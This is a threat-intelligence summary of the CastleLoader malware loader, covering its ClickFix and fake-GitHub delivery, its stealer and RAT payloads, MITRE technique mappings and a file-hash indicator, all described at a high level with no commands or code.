Threat Research

CastleLoader Targeting US Government Entities

Securonix
CastleLoader Targeting US Government Entities

CastleLoader is a modular malware loader that has infected 469 devices since May 2025 by using Cloudflare-themed ClickFix phishing pages and fake GitHub repositories to trick victims into executing malicious PowerShell or installers. It delivers multiple payloads including StealC, RedLine, NetSupport RAT, DeerStealer, HijackLoader, and SectopRAT, and has targeted U.S. government entities. #CastleLoader #StealC #RedLine #NetSupportRAT #DeerStealer #HijackLoader #SectopRAT

Keypoints

  • CastleLoader infected 469 of 1,634 attempted targets (28.7% infection rate) since May 2025.
  • Primary vectors: Cloudflare-themed ClickFix phishing pages prompting PowerShell Run execution and fake GitHub repositories distributing malicious installers.
  • Modular design deploys information stealers (StealC, RedLine, DeerStealer) and RATs/loaders (NetSupport RAT, SectopRAT, HijackLoader).
  • Uses PowerShell and AutoIT scripts to load shellcode in-memory, resolve hashed DLL names/APIs, and connect to seven distinct C2 servers.
  • Operators manage campaigns via a web-based panel with Delivery and Tasks modules, supporting geographic targeting, encrypted Docker payloads, and telemetry collection.
  • Campaigns enforce anti-VM checks, request administrative privileges, and use fake errors/CAPTCHA to social-engineer execution and evade detection.
  • Overlap with DeerStealer campaigns and use of legitimate file-sharing and compromised sites for payload hosting increase resilience and complicate attribution; over 400 critical victims include U.S. government entities.

MITRE Techniques

  • [T1059] Command and Scripting Interpreter – used PowerShell commands executed by users via the Windows Run prompt to launch the loader (“…tricking users into copying and executing malicious PowerShell commands via the Windows Run prompt…”).
  • [T1204] User Execution – ClickFix phishing and fake GitHub repositories trick users into running installers or scripts (“…lured to fraudulent domains… tricking users into copying and executing malicious PowerShell commands…” ).
  • [T1105] Ingress Tool Transfer – payloads retrieved from legitimate file-sharing services and compromised websites to download secondary payloads (“…payloads are retrieved from legitimate file-sharing services and compromised websites.”).
  • [T1055] Process Injection – AutoIT script loads shellcode into memory as a DLL to execute in-memory (“…the AutoIT script loads shellcode into memory as a DLL, resolving hashed DLL names and APIs…”).
  • [T1071] Application Layer Protocol – connects to command-and-control servers managed via a web-based panel to send telemetry and receive tasks (“…connect to one of seven distinct C2 servers… provide operators with detailed telemetry…”).
  • [T1497] Virtualization/Sandbox Evasion – campaigns enforce anti-VM detection to avoid analysis (“…Campaigns can enforce administrative privileges, anti-VM detection, and fake error displays to evade detection.”).
  • [T1566] Phishing – Cloudflare-themed ClickFix pages and fake error/CAPTCHA prompts used to social-engineer victims (“…ClickFix phishing technique, often themed around Cloudflare services… display fake error messages or CAPTCHA prompts…”).

Indicators of Compromise

  • [File Hash] CastleLoader sample – 05ecf871c7382b0c74e5bac267bb5d12446f52368bb1bfe5d2a4200d0f43c1d8
  • [File/Component Names] Secondary payloads delivered – StealC, RedLine, DeerStealer, NetSupport RAT, SectopRAT, HijackLoader
  • [Infrastructure] C2 servers and hosting contexts – seven distinct C2 servers managed via web panel; payloads hosted on legitimate file-sharing services and compromised websites

Read more: https://blog.polyswarm.io/castleloader